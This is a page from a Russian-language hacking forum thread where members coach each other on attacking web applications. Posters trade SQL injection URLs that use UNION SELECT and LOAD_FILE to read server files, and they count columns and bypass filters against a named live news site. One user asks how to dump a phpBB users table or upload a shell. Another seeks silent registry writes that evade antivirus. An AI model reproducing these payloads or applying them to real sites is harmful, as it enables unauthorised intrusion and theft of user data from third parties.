Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    kevmen Вопросы я смотрю пошли по кругу, на них уже отвечали , кури это :
    https://forum.antichat.ru/threadnav34338-1-10.html

    и вообще, давай сначала хоть что-то читай, потом вопросы по прочитанному
     
  2. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    jokester,хорошо,я читаю вот это
    http://forum.antichat.ru/thread43966.html

    и вопросы у меня именно по прочитанному)
     
    #4982 kevmen, 25 Jan 2009
    Last edited: 25 Jan 2009
  3. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    какие вопросы?? при экранировании кавычек into outfile не работает тк требует использования этих самых кавычек в синтаксисе.
     
  4. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,2,LOAD_FILE(0x766965775f6361742e706870),4,5,6,7,8,9

    ну вот )хочу прочесть файл view_cat.php.Страница отображается верно,но содержание файла не выводится ,я никогда не сталкивался с такими вещами,поэтому не знаю,как должна отображатся страница)извините,если пишу что-то не так и не то
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    kevmen
    ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

    Ты говорил , что читаешь это
    https://forum.antichat.ru/thread43966.html

    , так вот оттуда выдержка:
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,573
    Likes Received:
    976
    Reputations:
    783
    kevmen,
    user()
    ==>
    select file_priv from mysql.user where user = blablabla

    @localhost не пиши в юзнейме
     
    1 person likes this.
  7. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    jokester,спасибо)получилось,опять невнимательность)
    http://localhost/view_cat.php?cat=1+union+select+1,2,LOAD_FILE(0x5a3a5c686f6d655c6c6f63616c686f73745c7777775c7363686f6f6c5c766965775f6361742e706870),4,5,6,7,8,9
     
  8. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    я до этого еще не дошел,сейчас читаю
    https://forum.antichat.ru/threadnav34338-1-10.html
     
  9. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что думаете?
     
  10. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    первая )+order+by+32--+
    вторая не открывается
     
    2 people like this.
  11. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    а что это означает?
     
  12. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32

    я так понял стоит фильтрация на union?
     
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
    Чтобы увидеть вывод: =-3237)+union...
     
    1 person likes this.
  14. KranC

    KranC New Member

    Joined:
    24 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    с чего ты взял что там 32 поля?

    +order+by+ - не прокатывает
    +union+ - вроде как отключен
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
    Читайте внимательнее, сверху же l1ght написал....

    Что значит "union отключен"? )))
     
    1 person likes this.
  16. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
     
  17. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Урлу сюда
     
  18. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    здравствуйте
    у меня есть доступ к админке phpbb 2.0.13
    мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
    захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
    SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php

    как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
  20. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    чётат так не юзаеься ) куда это так надо написать?
    а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия :)

    WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");
     
    #5000 Neponomat, 26 Jan 2009
    Last edited: 26 Jan 2009
Loading...
Thread Status:
Not open for further replies.